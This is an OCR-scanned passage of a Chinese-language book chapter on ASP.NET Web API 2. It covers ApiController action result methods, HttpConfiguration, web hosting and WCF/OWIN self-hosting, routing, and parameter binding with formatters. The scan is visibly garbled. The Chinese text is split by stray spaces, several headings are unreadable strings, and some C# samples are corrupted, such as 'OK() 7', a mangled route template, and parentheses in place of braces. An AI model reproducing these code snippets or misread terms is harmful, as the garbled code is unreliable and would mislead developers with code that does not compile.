public IPrincipal User ( get; } 
// Request execution 
public virtual Task«HttpResponseMessage» 
ExecuteAsync( 
HttpControllerContext controllerContext, 
CancellationToken cancellationToken); 


protected virtual void 
Initialize( 
HttpControllerContext controllerContext); 


// Action results 
protected virtual BadRequestResult 


BadRequest () ; 
protected virtual InvalidModelStateResult 
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BadRequest ( 
ModelStateDictionary modelState); 
protected virtual BadRequestErrorMessageResult 
BadRequest ( 
string message); 


protected virtual ConflictResult 
Conflict(); 


protected virtual NegotiatedContentResult«T» 
Content«T»( 
HttpStatusCode statusCode, 
T value); 
protected FormattedContentResult«T» 
Content«T»( 
HttpStatusCode statusCode, 
T value, 
MediaTypeFormatter formatter); 
protected FormattedContentResult«T» 
Content«T»( 
HttpStatusCode statusCode, 
T value, 
MediaTypeFormatter formatter, 
string mediaType); 
protected virtual FormattedContentResult«T» 
Content«T»( 
HttpStatusCode statusCode, 
T value, 
MediaTypeFormatter formatter, 
MediaTypeHeaderValue mediaType); 


protected CreatedNegotiatedContentResult«T» 
Created«T»( 
string location, 
T content); 
protected virtual CreatedNegotiatedContentResult«T» 
Created«T»( 
Uri location, 
T content); 


protected CreatedAtRouteNegotiatedContentResult«T» 
CreatedAtRoute«T»( 
string routeName, 
object routeValues, 
T content); 
protected virtual CreatedAtRouteNegotiatedContentResult«T» 
CreatedAtRoute«T»( 
string routeName, 
IDictionary«string, object» routeValues, 
T content); 


protected virtual InternalServerErrorResult 
InternalServerError(); 

protected virtual ExceptionResult 
InternalServerError( 
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Exception exception); 


protected JsonResult«T» 
Json«T»( 
T content); 
protected JsonResult«T» 
Json«T»( 
T content, 
JsonSerializerSettings serializerSettings); 
protected virtual JsonResult«T» 
Json«T»( 
T content, 
JsonSerializerSettings serializerSettings, 
Encoding encoding); 


protected virtual NotFoundResult 
NotFound(); 


protected virtual OkResult 
OK() 7 
protected virtual OkNegotiatedContentResult«T» 
OK<T> ( 
T content); 


protected virtual RedirectResult 
Redirect( 
string location); 
protected virtual RedirectResult 
Redirect( 
Uri location); 


protected virtual RedirectToRouteResult 
RedirectToRoute( 
string routeName, 
IDictionary«string, object» routeValues); 
protected RedirectToRouteResult 
RedirectToRoute( 
string routeName, 
object routeValues); 


protected virtual ResponseMessageResult 
ResponseMessage( 
HttpResponseMessage response); 


protected virtual StatusCodeResult 
StatusCode( 
HttpStatusCode status); 


protected UnauthorizedResult 
Unauthorized( 
params AuthenticationHeaderValue[] challenges); 
protected virtual UnauthorizedResult 
Unauthorized( 
IEnumerable«AuthenticationHeaderValue» challenges); 
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ApiController 上 的 ExecuteAsync 方 法 是 接口 HttpController 中 的 方法 ， 顾 名 思 义 ， 它 意味 
着 所 有 Web API 控 制 器 都 是 异步 设计 。 当 使 用 Web API 时 ， 没 必要 为 异步 和 同步 操作 添加 分 割 
类 。 显 而 易 见 ， 这 里 的 管道 不 同 于 ASPNET， 因 为 不 能 访问 Response 对 象 ，API 控 制 器 期 望 返 
回 一 个 HttpResponseMessage 类 型 的 响应 对 象 。 
HttpRequestMessage 和 HttpResponseMessage 类 构成 了 System.Net.Http 中 HTTP 支 持 的 基 
础 。 这 些 类 的 设计 不 同 于 ASPNET 的 核心 运行 时 类 ， 在 这 个 栈 的 处 理 方法 中 ， 给 定 一 个 请 求 
消息 ， 期 望 返 回 一 个 响应 消息 。 不 像 在 ASPNET 中 ，SystemNetHttp 类 没有 静态 方法 访问 持 
续 请 求 的 信息 。 这 也 意味 着 , 不 必 直 接 写 入 响应 流 , 开发 人 员 可 以 返回 一 个 描述 响应 的 对 象 ， 
然后 在 需要 时 泻 染 。 


11.53. fEABSERIES Z 


为 从 请 求 中 接收 传 入 的 值 ， 可 在 操作 上 放置 参数 ， 就 像 在 MVC 中 一 样 ，Web API 框 架 会 
自动 为 这 些 操作 方法 提供 参数 值 。 和 MVC 不 同 的 是 ， 从 HTTP 主 体 获取 的 值 和 从 其 他 地 方 ( 比 
如 URD 获 取 的 值 之 间 存 在 明显 区 别 。 

默认 情况 下 ，Web API 会 假设 简单 类 型 (也 就 是 内 部 类 型 ， 如 字符 串 、 日 期 、 时 间 和 带 有 
一 个 字符 串 类 型 转换 器 的 类 型 ) 的 参数 是 非 主体 值 ， 而 复合 类 型 从 主体 获取 。 此 外 ,还 有 一 个 
额外 的 限制 ， 只 有 一 个 值 可 以 来 自主 体 ， 并 且 这 个 值 必须 代表 整个 主体 。 

如 果 传 入 参数 不 是 主体 的 一 部 分 ， 就 会 由 模型 绑 定 系统 处 理 ， 这 里 的 模型 绑 定 系 统 与 
MVC 中 的 相似 。 从 另 一 方面 说 ， 传 入 和 输出 的 主体 会 被 一 个 称 为 “格式 化 器 ”的 全 新 概念 处 
理 。 本 章 后 面 会 详细 介绍 模型 绑 定 和 格式 化 器 。 


11.3.4 ”操作 返回 值 、 错 误 和 异步 


Web API 控 制 器 以 操作 返回 值 的 方式 把 值 发 送 回 客户 端 。 可 通过 ExecuteAsync 的 签名 猜 
测 ，Web API 中 的 操作 可 以 返回 HttpResponseMessage 来 作为 发 送 回 客户 端的 响应 。 返 回响 应 
对 象 是 一 个 相当 低级 的 操作 ， 所 以 Web API 控 制 器 几乎 总 是 返回 一 个 原始 对 象 值 或 值 序列 ， 
或 者 返回 一 个 操作 结果 (一 个 实现 了 IHttpActionResult 接 口 的 类 )。 

当 操作 返回 一 个 原始 对 象 时 , Web API 使 用 称 为 内 容 协商 (Content Negotiatiom) 的 功能 把 它 
自动 转换 成 一 个 符合 要 求 的 结构 化 响应 ， 比 如 JSON 或 XML。 正 如 前 面 提 到 的 ， 用 来 转换 的 
扩展 格式 机 制 会 在 本 章 后 面 进行 介绍 。 

返回 原始 对 象 的 能 力 是 非常 强大 的 ， 但 在 从 ActionResult 或 IHttpActionResult 的 转换 过 程 
中 ， 我 们 也 会 丢掉 一 些 东 西 ， 也 就 是 说 ， 为 成 功 和 失败 返回 不 同 值 的 能 力 。 当 操作 签名 强 连 
接 到 我 们 想 成 功 使 用 的 返回 值 类 型 时 ， 如 何 轻松 地 支持 返回 一 些 错误 的 不 同 表 示 呢 ? 如 果 我 
们 把 操作 签名 修改 为 HttpResponseMessage， 这 样 会 使 控制 器 操作 和 单元 测试 变 得 复杂 。 

为 解决 这 个 问题 ，Web API 人 允许 开发 人 员 从 操作 中 抛 出 HttpResponseException 异 常 ， 从 而 
表示 返回 的 是 HttpResponseMessage 而 不 是 成 功 的 对 象 数据 。 这 样 一 来 ， 存 在 错误 的 操作 可 以 
构建 一 个 新 响应 并 抛 出 响应 异常 ， 然 后 Web API 框 架 就 像 操 作 直 接 返回 的 响应 消息 那样 进行 
处 理 。 然 后 ， 成 功 的 响应 可 以 继续 返回 原始 的 对 象 数 据 ， 增 加 简单 单元 测试 的 好 处 。 

Web API 2 为 这 个 问题 引入 了 一 个 更 好 的 解决 方案 : 新 增 的 操作 结果 类 。 为 返回 操作 结果 ， 
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Web API 的 控制 器 操作 使 用 返回 值 类 型 IHttpActionResult， 正 如 MVC 控 制 器 使 用 ActionResult 
一 样 。ApiController 类 包含 许多 直接 返回 操作 结果 的 方法 ， 下 面 描述 它们 的 结果 行为 ; 


BadRequest: 返回 HTTP 400(“Bad Requesft)。 根 据 ModelStateDictionary 中 的 验证 错 
误 ， 可 能 会 包含 一 条 消息 或 一 个 自动 格式 化 的 错误 类 。 

Conflict: 返回 HTTP 409 ("Conflict"). 

Content: 返回 内 容 (类 似 于 返回 一 个 原始 对 象 的 操作 方法 的 行为 )。 内 容 格 式 是 自动 协 
商 的， 不 过 开发 人 员 也 可 以 指定 响应 的 媒体 类 型 格式 化 器 和 /或 内 容 类 型 。 开 发 人 员 
选择 响应 使 用 的 HTTP 状态 码 。 

Created: 返回 HTTP 201(“Created")。 位 置 头 被 设 为 提供 的 URL 位 置 。 
CreatedAtRoute: 返回 HTTP 201 (Created”)。 位 置 头 被 设 为 基于 提供 的 路 由 名 和 路 由 
值 构造 的 URL. 

InternalServerError: 返回 HTTP 500(*Internal Server Error”)。 可 能 会 包含 提供 的 异常 
派生 出 的 内 容 。 

Json: 返回 HTTP 200(“OK”)， 将 提供 的 内 容 格式 化 为 JSON 格式 。 还 可 以 使 用 提供 
的 序列 化 器 设置 和 /或 字符 编码 来 格式 化 内 容 。 

NotFound: 返回 HTTP 404(“Not Found"). 

Ok: 返回 HTTP 200(*OK"). 可 能 包含 格式 被 自动 协商 的 内 容 (要 精确 指定 格式 ， 需 要 
使 用 Content 方法 )。 

Redirect: 返回 HTTP 302('Found”)。 位 置 头 被 设 为 指定 的 URL 位置。 
RedirectToRoute: 返回 HTTP 302(“Found”)。 位 置 头 被 设 为 基于 提供 的 路 由 名 和 路 由 
值 构 造 的 URL。 

ResponseMessage: 返回 提供 的 HttpResponseMessage。 

StatusCode: 返回 带 有 提供 的 HTTP 状态 码 ( 和 一 个 空 响应 体 ) 的 响应 。 

Unauthorized: 返回 HTTP 401(“Unauthorized”)。 身 份 验证 头 被 设 为 提供 的 身份 验证 
头 值 。 


© 


注意 ASPNET Web API2 添 加 对 操作 结果 的 支持 时 ， 需 要 把 操作 结果 添加 
到 Web API 管 道中 ,又 不 破坏 已 有 的 特性 ; 针对 使 用 操作 结果 的 操作 方法 运行 的 
过 滤器 特性 在 管道 中 看 到 的 是 泻 染 后 的 HttpResponseMessage， 而 不 是 原始 的 
IHttpActionResult 对 象 。 这 也 意味 着 在 Web API 2 中 ， 为 Web API 1 编写 的 过 滤器 
仍 可 照样 运行 。 


关于 操作 返回 值 的 最 后 说 明 : 如 果 操 作 本 质 上 就 是 异步 的 ， 就 是 操作 中 使 用 了 其 他 异步 
API, 我 们 可 以 把 操作 返回 值 的 签名 改 为 Task<T>, 并 使 用 NET 4.5 中 的 async 和 await 特 性 来 把 
我 们 的 顺序 代码 无 颖 地 转换 成 异步 代码 。Web API 理 解 操作 返回 Task<T> 的 时 间 ， 它 应 该 简单 
地 等 待 任务 完成 ， 然 后 解 包 T 类 型 的 返回 对 象 ， 从 逻辑 上 就 像 操 作 直 接 返 回 的 一 样 。 这 也 包 
括 操作 结果 (例如 ，Task<IHttpActionResult>)。 
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11.4 配置 Web API 


我 们 可 能 极 想 知道 控制 器 上 的 Configuration 属 性 。 在 传统 的 ASPNET 应 用 程序 中 ， 应 用 
程序 配置 在 Global.asax 中 完成 , 应 用 程序 使 用 全 局 状态 (包括 静态 的 和 线程 局 部 变量 ) 访 问 请 求 
和 应 用 程序 配置 。 

Web API 被 设计 为 不 具有 任何 这 样 的 静态 全 局 值 ， 而 把 它 的 配置 放 在 HttpConfiguration 类 
中 。 这 对 应 用 程序 设计 有 两 方面 影响 : 第 一 ， 可 在 一 个 应 用 程序 中 运行 多 个 Web API 服 务 器 ， 
因为 每 个 服务 器 有 它 自 身 的 非 全 局 配置 ， 第 二 ， 可 在 Web API 中 更 方便 地 运行 单元 测试 和 端 
到 端 测试 ， 因 为 我 们 把 配置 包含 在 了 一 个 非 全 局 对 象 中 ， 由 于 静态 可 以 使 平行 测试 更 具 挑 
战 性 。 

配置 类 包含 访问 以 下 项 : 

e 路 由 
为 所 有 请 求 运行 的 过 滤器 
参数 绑 定 规则 
读 写 主体 内 容 使 用 的 默认 格式 化 器 
Web API 使 用 的 默认 服务 
用 户 提供 的 依赖 解析 器 (针对 服务 和 控制 器 上 的 DD 
HTTP 消息 处 理 程序 
标记 是 否 包含 像 堆栈 跟踪 这 样 的 错误 细节 
可 以 存放 用 户 定义 值 的 Properties 袋 

创建 和 访问 这 些 配置 的 方式 取决 于 我 们 如 何 托管 应 用 程序 : 在 ASPNET 内 ， 在 WCF 自 托 
管内 ， 还 是 在 新 的 OWIN 自 托管 内 。 


11.4.1 Web 托 管 Web API 的 配置 


默认 的 MVC 项 目 模板 都 是 Web 托 管 项 目 ， 因 为 MVC 仅 支持 Web 托 管 。 在 App_Startup 文 件 
夹 中 ， 我 们 会 看 到 MVC 应 用 程序 的 启动 配置 文件 。Web API 配 置 代码 在 文件 
WebApiConfig.cs( 或 .vb) 中 ， 代 码 如 下 : 


public static class WebApiConfig { 
public static void Register(HttpConfiguration config) ( 
// Web API configuration and services 


// Web API routes 
config.Routes.MapHttpAttributeRoutes(); 
config.Routes.MapHttpRoute ( 

name: "DefaultApi", 


routeTemplate: "api/tcontrotler}/ tid} um 
defaults: new { id = RouteParameter. optional } 
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开发 人 员 会 修改 这 个 文件 以 满足 他 们 自己 应 用 程序 的 需求 。 默 认 会 包含 一 个 路 由 示例 。 

如 果 查 看 Globalasax 文 件 内 容 , 会 发 现 这 个 配置 函数 通过 将 WebApiConfig Register 方 法 作 
为 参数 传 进 GlobalConfiguration.Configure 方 法 来 调用 。 这 是 与 Web API 1 不 同 的 地 方 。 在 Web 
API 1 中 ， 是 直接 调用 WebApiConfig.Register 方 法 的 。 由 于 保证 了 配置 按 正确 的 顺序 运行 ， 这 
种 改变 方便 了 使 用 特性 路 由 (本 章 稍 后 将 进行 讨论 )。Web 托 管 的 Web API 仅 支持 单一 服务 器 和 
单一 配置 文件 ， 开 发 人 员 不 需要 创建 这 些 文件 ， 只 需要 正确 地 配置 它们 。GlobalConfiguration 
类 在 程序 集 System.Web.Http.WebHost.dll 中 ， 基 础 设施 的 其 余部 分 也 在 这 个 文件 中 ， 用 来 支持 
Web 托 管 的 Web API。 


11.4.2 ” 自 托 管 Web API 的 配置 


与 Web API 一 起 发 布 的 另外 两 个 托管 是 基于 WCF 的 自 托管 (包含 在 程序 集 
System. Web.Http.SelfHost.dll 中 ) 和 基于 OWN 的 自 托 管 ( 包 含 在 程序 集 
System .Web.Http.Owin.dll 中 )。 当 想 要 在 Web 项 目的 外 托管 API 时 (这 通常 意味 着 托管 在 控制 台 
应 用 程序 或 Windows 服 务 中 )， 这 两 个 自 托管 选项 都 很 有 用 。 

没有 针对 自 托管 的 内 置 项 目 模板 ,因为 当 需 要 使 用 自 托管 时 , 这 样 就 没有 项 目 类 型 限制 。 
在 应 用 程序 中 使 Web API 运 行 的 最 简单 方式 是 使 用 NuGet 安 装 合适 的 自 托管 Web API 包 
(Microsoft. AspNet. WebApi.SelfHost 或 Microsoft AspNet WebApiOwinSelfHosb。 两 个 包 安 装 之 
后 就 会 自动 包含 所 有 的 System.NetHttp 和 System.Web.Http 依 赖 。 

当 使 用 自 托管 时 ， 我 们 需要 正确 地 创建 配置 ， 启 动 和 停止 Web API 服 务 器 。 每 个 自 托管 
系统 都 使 用 略微 不 同 的 配置 系统 ， 下 面 的 小 节 将 进行 介绍 。 


1. 配置 WCF 自 托管 


我 们 需要 实例 化 的 配置 类 是 HttpSelfHostConfiguration， 因 为 它 通过 要 求 一 个 监听 的 URL 
扩展 了 基 类 HttpConfiguration。 正 确 配 置 好 之 后 ， 就 会 创建 一 个 HttpSelfHostServer 的 实例 ， 然 
后 告诉 它 开 始 监 听 。 

下 面 是 WCF 自 托管 启动 代码 的 一 个 示例 片段 : 


var config = new HttpSelfHostConfiguration("http://localhost:8080/"); 


config.Routes.MapHttpRoute( 
name: "DefaultApi", 
routeTemplate: "api/(controller]/(id])", 
defaults: new ( id = RouteParameter.Optional } 


); 


var server = new HttpSelfHostServer (config); 
server.OpenAsync().Wait(); 


完成 之 后 ， 我 们 应 该 关闭 服务 器 : 


server.CloseAsync().Wait(); 
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如 果 在 控制 台 应 用 程序 中 是 自 托管 ， 我 们 应 该 在 Main 函 数 中 运行 这 些 代码 。 对 于 其 他 应 
程序 类 型 的 自 托管 ， 只 需要 找到 合适 位 置 以 运行 应 用 程序 的 启动 和 关闭 代码 ， 并 运行 这 些 
代码 即 可 。 这 两 种 情况 下 , 如 果 应 用 程序 开发 框架 允许 编写 异步 启动 和 关闭 代码 , 我 们 可 以 (应 
该 ) 用 异步 代码 一 一 async 和 await 一 一 代替 .Wait0 调 用 。 


2. ME OWN 自 托管 


OWIN(Open Web Interface for NET) 是 定义 Web 应 用 程序 的 一 种 相对 较 新 的 方法 ， 可 以 帮 
助 将 应 用 程序 与 托管 环境 和 运行 应 用 程序 的 Web 服 务 器 隔离 开 。 这 样 一 来 ， 可 以 让 编写 的 应 
程序 托管 在 IS 内 ， 自 定义 Web 服 务 器 内 ， 甚 至 ASPNET 内 。 


T 


(D) EE owmktiutaAA —EAEGGUOLA. KERRIER 
是 简单 介绍 , 帮助 读者 知道 如 何 开始 使 用 OWIN 自 托管 。 关于 OWIN 的 更 多 信息 ， 
请 访问 OWIN 的 主页 : http://owin.org/。 
ASPNET 团 队 开 始 了 一 个 叫做 Katana 的 项 目 ， 围 绕 OWIN 提 供 了 大 量 基础 架 
构 ， 包 括 托管 可 执行 文件 和 接口 库 ， 以 OWIN 应 用 程序 在 HttpListener 或 IIS 中 运 
行 (有 没有 ASPNET 都 没有 关系 )。 关 于 Katana 的 更 多 信息 ， 请 访问 此 网 址 : 
http://www.asp.net/aspnet/overview/owin-and-katana/an-overview-of-project-katana, 


由 于 OWIN 将 Web 服 务 器 从 Web 应 用 程序 中 抽象 了 出 来 , 所 以 还 需要 选择 一 种 方式 将 应 用 
程序 连接 到 选择 的 Web 服 务 器 。NuGet 包 Microsoft.AspNet.WebApi.OwinSelfHost 通 过 引入 
Katana 项 目的 部 分 功能 ， 使 得 我 们 很 容易 使 用 HttpListener 自 托管 Web API。HttpListener 不 依 
赖 于 IS。 

下 面 是 基于 控制 台 的 OWIN 自 托管 应 用 程序 可 能 使 用 的 一 段 示 例 代码 : 

using (WebApp.Start«Startup» ("http://localhost:8080/")) { 

Console.WriteLine("Server is running. Press ENTER to quit."); 
Console.ReadLine(); 

} 

注意 这 段 代码 不 包含 Web API 引 用 ; 相反 , 代码 启动 了 一 个 叫做 Startup 的 类 ,支持 Web API 
的 Startup 类 的 定义 如 下 所 示 : 

using System; 

using System.Linqg; 


using System.Web.Http; 
using Owin; 


class Startup ( 
public void Configuration(IAppBuilder app) ( 
var config = new HttpConfiguration(); 


config.Routes.MapHttpRoute ( 
name: "DefaultApi", 
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routeTemplate: "api/{controller}/{id}", 
defaults: new { id = RouteParameter.Optional } 


); 


app.UseWebApi (config); 
) 
i 
OWIN 应 用 程序 中 的 Startup 类 在 概念 上 替代 了 Web 托 管 应 用 程序 中 的 WebApiConfig 类 。 
OWIN 中 的 IAppBuilder 类 型 允许 配置 运行 的 应 用 程序 ; 可 以 使 用 Web API OWIN Self Host 包 提 
供 的 UseWebApi 扩 展 方法 来 配置 OWIN。 


3. 选择 WCF 或 OWIN 自 托 管 


ASPNET Web API 提 供 了 两 种 不 同 的 自 托管 方案 ， 这 可 能 让 人 有 点 困惑 。 当 MVC 4 第 一 
次 发 布 Web API 1 时 , OWIN 框 架 还 没有 进入 1.0 版 本 , 所 以 ASPNET 团 队 决 定 重 用 WCF 托 管 基 
础 设施 来 进行 自 托管 。 

现在 OWIN 已 经 完成 ，ASPNET 团 队 在 许多 产品 上 都 大 力 推进 OWIN 托 管 ， 并 不 只 是 在 
Web API 中 。 而 且 ，OWIN 人 允许 多 个 应 用 程序 框架 轻松 并 存 ， 甚 至 允许 那些 应 用 程序 共享 相同 
的 功能 (叫做 中 间 件 )， 比 如 身份 验证 和 缓存 。 虽 然 OWIN 1.0 版 本 在 最 近 才 发 布 ， 但 是 社区 中 
已 经 使 用 OWIN 一 段 时 间 了 ， 而 且 许 多 第 三 方 应 用 程序 框架 可 以 运行 在 OWIN 上 ， 例 如 Nancy 
和 FubuMVC。 另 外 ，OWIN 通 过 Katana(Web API 的 OWIN 自 托管 库 使 用 ) 和 Nowin( 纯 粹 的 基 
于 .NET 的 Web 服 务 器 ) 等 框架 提供 了 可 插 拔 的 Web 服 务 器 支持 。 

基于 以 上 原因 ， 笔 者 建议 在 使 用 自 托管 Web API 的 新 项 目 中 选择 OWIN。 不 过 使 用 WCF 
自 托 管 也 没有 错 。 很 明显 ，WCF 自 托管 将 作为 “遗留 ”解决 方案 存在 ， 而 ASPNET 的 大 部 分 
内 容 将 移 向 OWIN 平 台 。 


11.5 Web API 添 加 路 由 


正如 前 一 节 中 所 讲 的 ，Web API 的 主要 路 由 注册 是 MapHttpRoute 扩 展 方 法 。 与 所 有 Web 
API 配 置 任务 一 样 ， 为 应 用 程序 的 路 由 配置 了 HttpConfiguration 对 象 。 

如 果 查 看 配置 对 象 ， 我 们 会 发 现 Routes 属 性 指向 HttpRouteCollection 类 的 一 个 实例 ， 而 不 
是 ASPNET 的 RouteCollection 类 实例 。Web API 提 供 了 一 些 直接 依赖 ASPNET 中 
RouteCollection 类 的 MapHttpRoute 版 本 ， 但 这 些 路 由 只 有 在 Web 托 管 时 才能 使 用 ， 因 此 ， 笔 者 
推荐 (和 项 目 模板 鼓励 ) 使 用 HttpRouteCollection 上 的 MapHttpRoute 版 本 。 


© 注意 “Web API2 应 用 程序 也 可 以 使 用 MVC 5 中 引入 的 基于 特性 的 路 由 . 要 | 
为 Web API 控 制 器 启用 特性 路 由 ， 需 要 把 下 面 一 行 代码 添加 到 Web API 的 启动 代 
| 码 中 ， 放 到 所 有 手动 配置 路 由 的 前 面 : 


| config.MapHttpAttributeRoutes (); 


Web API 路 由 系统 使 用 的 路 由 逻辑 与 MVC 一 样 ， 都 能 用 来 帮助 决定 哪个 URI 应 该 路 由 到 
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应 用 程序 的 API 控 制 器 。 因 此 ， 我 们 从 MVC 学 习 的 概念 可 以 应 用 到 Web API， 比 如 路 由 匹配 
模式 、 默 认 和 约束 。 为 避免 Web API 拥 有 ASPNET 的 硬 依赖 , 开发 团队 采用 了 ASPNET 路 由 代 
码 的 副本 ， 并 把 它 移植 到 Web API。 修 改 这 个 代码 的 行为 方式 在 一 定 程度 上 会 依赖 于 我 们 的 
托管 环境 。 

当 在 自 托管 环境 中 运行 时 ，Web API 会 使 用 它 自己 的 私有 路 由 代码 副本 ， 这 里 的 路 由 代 
码 副本 是 从 ASPNET 移 植 到 Web API 中 的 。Web API 中 的 路 由 与 MVC 中 的 路 由 几乎 一 样 , 但 类 
名 稍 有 不 同 ， 例 如 HttpRoute 和 Route。 

当 应 用 程序 是 Web 托 管 时 ，Web API 会 使 用 ASPNET 的 内 置 路 由 引擎 ,因为 它 已 经 连接 到 
了 ASPNET 请 求 管道 。 当 在 Web 托 管 环境 中 注册 路 由 时 ， 系 统 就 不 只 会 注册 HttpRoute 对 象 ， 
也 会 自动 创建 封装 Route 对 象 ， 并 在 ASPNET 路 由 引擎 中 注册 这 些 对 象 。 自 托管 和 Web 托 管 之 
间 的 主要 区 别 在 于 路 由 的 运行 时 刻 ， 对 于 Web 托 管 ，ASPNET 运 行路 由 非常 早 ， 但 在 自 托管 
情形 中 ，Web API 运 行路 由 的 时 刻 就 非常 晚 。 如 果 编 写 消息 处 理 程序 ， 知 道 我们 可 能 无 法 访 
问 路 由 信息 是 很 重要 的 ， 因 为 此 时 路 由 可 能 尚未 运行 。 

默认 的 MVC 路 由 与 默认 的 Web API 路 由 之 间 最 显著 的 差异 在 于 ， 后 者 缺少 {action} 指 令 。 
正如 前 面 讨论 的 ，Web API 操 作 默 认 根据 请 求 使 用 的 HTTP 动 词 来 调度 。 然 而 ， 可 以 通过 使 
用 路 由 中 的 {action} 匹 配 指令 或 通过 向 路 由 的 默认 值 中 添加 一 个 action 值 来 重 写 这 个 映射 。 当 
路 由 包含 一 个 action 值 时 ，Web API 就 会 使 用 操作 名 称 查找 合适 的 操作 方法 。 

甚至 当 使 用 基于 操作 名 称 的 路 由 时 ， 仍 然 可 以 使 用 默认 的 动词 映射 ， 也 就 是 说 ， 如 果 操 
作 名 称 以 一 个 常见 的 动词 名 称 (Get、Post、Put、Delete、Head、Patch 和 Options) 开 头 ， 然 后 这 
个 操作 就 可 以 匹配 名 称 开 头 对 应 的 动词 。 对 于 名 称 不 能 匹配 常见 动词 的 所 有 操作 ， 默 认 支 持 
的 动词 是 POST。 应 该 使 用 [Http.…] 特 性 家 族 ([HttpDelete]、 [HttpGet]、 [HttpHead]、 [HttpOptions]、 
[HttpPatch]、[HttpPost] 和 [HttpPut]) 或 [AcceptVerb] 特 性 来 装饰 操作 ， 以 表明 允许 的 动词 ( 当 默 
认 约 定 不 正确 的 时 候 )。 


11.6 HESH 


前 面 关于 “主体 值 ” 和 “ 非 主体 值 ” 的 讨论 引导 我 们 继续 讨论 格式 化 器 和 模型 绑 定 器 
因为 这 两 个 类 分 别 负责 处 理 主体 和 非 主体 值 。 

当 我 们 编写 操作 方法 签名 和 包含 参数 时 ， 一 方面 来 说 ， 来 自主 体 的 复杂 类 型 通常 意味 着 
由 格式 化 器 负责 生成 ， 从 另 一 方面 说 ， 来 自 非 主体 的 简单 类 型 通常 意味 着 由 模型 绑 定 器 负责 
生成 。 对 于 将 要 发 送 的 主体 内 容 ， 我 们 使 用 格式 化 器 来 解码 这 些 数 据 。 

为 了 完整 介绍 内 容 ， 我 们 需要 提出 一 个 Web API 的 新 概念 : 参数 绑 定 。Web API 使 用 参数 
绑 定 器 来 决定 如 何 为 各 个 参数 提供 值 。 特 性 可 以 用 来 影响 这 个 决定 ， 比 如 我 们 之 前 使 用 MVC 
时 看 到 的 特性 [ModelBinderj， 但 当 没 有 重 写 方法 影响 绑 定 决 定时 ， 默 认 的 逻辑 使 用 简单 类 型 
和 复合 类 型 。 

参数 绑 定 系统 通过 查看 操作 参数 寻找 ParameterBindingAttribute 派 生 的 属性 .Web API 中 创 
建 有 一 些 这 样 的 特性 ， 如 下 面 的 列表 所 示 。 此 外 ， 还 可 以 通过 在 配置 文件 中 注册 或 者 通过 编 
写 基 于 ParameterBindingAttribute 的 特性 ， 来 注册 不 使 用 模型 绑 定 器 和 格式 化 器 的 自 定义 参数 
绑 定 器 。 
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e ModelBinderAttribute: 该 特性 告诉 参数 绑 定 系统 使 用 模型 绑 定 ， 也 就 是 通过 使 用 注册 
模型 绑 定 器 和 值 提供 器 创建 值 。 这 就 是 通过 简单 类 型 参数 的 默认 绑 定 逻辑 表示 的 内 
容 。 

e FromUriAttribute: 该 特性 是 一 个 专门 的 ModelBindingAttribute， 它 告诉 系统 只 能 使 用 
实现 了 IUriValueProviderFactory 的 值 提供 器 ， 从 而 限制 值 的 范围 ， 确 保 它 们 只 能 从 


URI 获取 。 开 箱 即 用 ， 路 由 数据 和 Web API 中 的 查询 字符 串 值 提供 器 实现 了 这 个 接 


* FromBodyAttribute: 该 特性 告诉 参数 绑 定 系 统 使 用 格式 化 器 ， 也 就 是 通过 查找 
MediaTypeFormatter 的 实现 创建 值 ， 这 里 MediaTypeFormatter 可 以 解码 主体 ， 从 解码 
主体 数据 中 创建 给 定 类 型 。 这 就 是 通过 任何 复合 类 型 的 默认 绑 定 逻辑 表示 的 内 容 。 

参数 绑 定 系 统 与 MVC 的 工作 方式 完全 不 同 。 在 MVC 中 ， 所 有 参数 都 是 通过 模型 绑 定 创 

建 。Web API 模 型 绑 定 的 工作 方式 与 MVC( 模 型 绑 定 器 和 提供 器 ， 值 提供 器 和 工厂 ) 几 乎 一 样 ， 

尽管 它 稍微 重 构 了 基于 MVC Futures 中 的 备用 模型 绑 定 系统 。 针 对 数组 、 人 集合、 字典、 简单 

类 型 甚至 复合 类 型 ， 我 们 会 发 现 有 对 应 的 内 置 模型 绑 定 器 ， 尽 管 需要 使 用 ModelBinder] 来 运 

行 这 些 绑 定 器 。 虽 然 接口 有 轻微 改动 , 但 是 如 果 知 道 如 何在 MVC 中 编写 模型 绑 定 器 和 值 提供 

器 ， 那 么 我 们 也 能 为 Web API 做 同样 的 事情 。 

格式 化 器 是 一 个 Web API 的 新 概念 。 格 式 化 器 主要 负责 使 用 和 生成 主体 内 容 。 我 们 可 以 

把 格式 化 器 想象 成 NET 中 的 序列 化 器 (serializers): 负责 编码 和 解码 出 入 主体 内 容 字 节 流 的 自 

定义 复合 类 。 我 们 可 以 把 一 个 对 象 精确 编码 到 主体 ， 也 可 以 从 主体 中 精确 解码 一 个 对 象 ， 虽 

然 对 象 可 以 包含 嵌 套 对 象 ， 正 如 .NET 中 的 复合 类 型 。 

我 们 会 在 Web API 内 部 发 现 三 种 格式 化 器 : 一 种 使 用 Json.NET 编 码 和 解码 JSON， 一 种 使 
DataContractSerializer 或 XmlSerializer 编 码 和 解码 XML， 另 一 种 解码 表单 URL， 编 码 主体 数 
据 ， 这 些 数据 都 来 自 浏览 器 表单 提交 。 每 一 个 格式 化 器 都 非常 强大 ， 都 会 努力 把 它 支持 的 格 
式 转 码 到 我 们 选择 的 类 。 


注意 虽然 大 多 数 Web API 都 被 设计 来 支持 编写 API 服 务 器 ， 但 是 内 置 的 
二 JSON 和 XMI 格 式 化 器 对 客户 端 应 用 程序 也 同样 有 用 。 System Net Http 中 的 HTTP 
类 都 是 关于 原始 的 HTTP， 不 包含 任何 类 型 对 象 到 内 容 的 映射 系统 ， 比 如 格式 
化 器 。 
Web API 团 队 选 择 把 格式 化 器 放 入 单独 的 DDL 中 ， 这 里 DLL 名 为 
System NetHttp Formatting。 由 于 这 个 DLL 除了 SystemNetHttp 之 外 没有 任何 依 
赖 ， 因 此 它 在 客户 端 和 服务 器 HTTP 编 码 中 均 可 应 用 一 一 个 非常 大 的 好 处 就 
是 ， 我 们 编写 的 基于 .NET 的 客户 端 应 用 程序 可 以 使 用 我 们 编写 的 Web API 服 务 。 
DLL 包含 一 些 对 HttpClient、HttpRequestMessage 和 HttpResponseMessage 有 
益 的 扩展 方法 , 这 样 我 们 就 可 以 在 客户 端 和 服务 器 应 用 程序 中 容易 地 使 用 内 置 
格式 化 器 。 注意 ,表单 URL 编 码 格 式 化 器 放 在 这 个 DLL 中 ， 但 由 于 它 只 能 解码 
浏览 器 提交 的 表单 数据 ， 而 不 能 进行 编码 ， 因 此 很 可 能 对 客户 端 应 用 程序 价值 
不 大 。 


38118 ASPNET Web API 


11.7 过滤 请 求 


